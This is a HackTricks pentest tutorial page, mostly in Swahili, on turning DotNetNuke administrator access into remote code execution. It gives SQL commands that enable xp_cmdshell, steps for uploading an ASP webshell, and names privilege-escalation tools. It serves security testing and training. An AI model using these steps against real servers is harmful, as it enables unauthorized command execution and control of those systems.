3.3 KiB
DotNetNuke (DNN)
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
DotNetNuke (DNN)
Ikiwa unaingia kama meneja katika DNN ni rahisi kupata RCE.
RCE
Kupitia SQL
Konsoli ya SQL inapatikana chini ya ukurasa wa Settings ambapo unaweza kuwezesha xp_cmdshell na kufanya amri za mfumo wa uendeshaji.
Tumia mistari hii kuwezesha xp_cmdshell:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Na bonyeza "Run Script" ili kuendesha hizo sentensi za sQL.
Kisha, tumia kitu kama ifuatavyo kuendesha amri za OS:
xp_cmdshell 'whoami'
Kupitia ASP webshell
Katika Settings -> Security -> More -> More Security Settings unaweza kuongeza nyongeza mpya zinazoruhusiwa chini ya Allowable File Extensions, na kisha kubonyeza kitufe cha Save.
Ongeza asp au aspx na kisha katika /admin/file-management pakia asp webshell inayoitwa shell.asp kwa mfano.
Kisha upate /Portals/0/shell.asp ili kufikia webshell yako.
Kuinua Haki
Unaweza kuinua haki kwa kutumia Potatoes au PrintSpoofer kwa mfano.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.